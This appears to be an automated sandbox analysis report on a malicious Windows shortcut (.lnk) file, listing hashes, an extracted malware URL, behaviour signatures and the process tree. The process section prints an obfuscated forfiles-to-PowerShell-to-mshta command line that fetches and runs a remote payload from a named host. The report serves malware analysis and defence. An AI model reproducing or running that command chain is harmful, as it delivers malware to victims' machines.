Analysis
-
max time kernel
93s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20/09/2024, 01:41
Static task
static1
Behavioral task
behavioral1
Sample
c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk
Resource
win10v2004-20240802-en
General
-
Target
c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk
-
Size
272KB
-
MD5
47c69db79640bcff28c4609d7cb9fdf1
-
SHA1
9b7d6e44525f5c7b1ad0ad50232ae2f00ef19c21
-
SHA256
c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c
-
SHA512
97cfbb41da9521c45c4b204c0c8cc6a551921b39f052d4b68787668e4b16185c7e70e380c25fc05731a4c9fe2fa491682fc09ceee8dbf38a11b73f1ecaa83ee4
-
SSDEEP
24:8Wi+1hAh52pyAzPkr+/4h+sPSLDgdd79ds6xmab/U3IVqm:8WTo8zmbQEdJ9KabU3Kq
Malware Config
Extracted
https://siff-sd.com/temp/Docs-08-2024
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 9 4960 mshta.exe 13 4960 mshta.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation cmd.exe -
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 1728 forfiles.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4968 powershell.exe 4968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4968 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3580 wrote to memory of 1728 3580 cmd.exe 83 PID 3580 wrote to memory of 1728 3580 cmd.exe 83 PID 1728 wrote to memory of 4968 1728 forfiles.exe 84 PID 1728 wrote to memory of 4968 1728 forfiles.exe 84 PID 4968 wrote to memory of 4960 4968 powershell.exe 85 PID 4968 wrote to memory of 4960 4968 powershell.exe 85
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . \*i*\*2\msh*e https://siff-sd.com/temp/Docs-08-20242⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. \*i*\*2\msh*e https://siff-sd.com/temp/Docs-08-20243⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://siff-sd.com/temp/Docs-08-20244⤵
- Blocklisted process makes network request
PID:4960
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82